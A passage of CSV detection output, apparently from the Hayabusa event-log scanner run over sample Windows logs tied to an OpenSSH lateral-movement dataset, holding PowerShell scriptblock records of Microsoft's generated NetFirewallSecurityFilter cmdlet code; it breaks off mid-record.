$__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.403 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 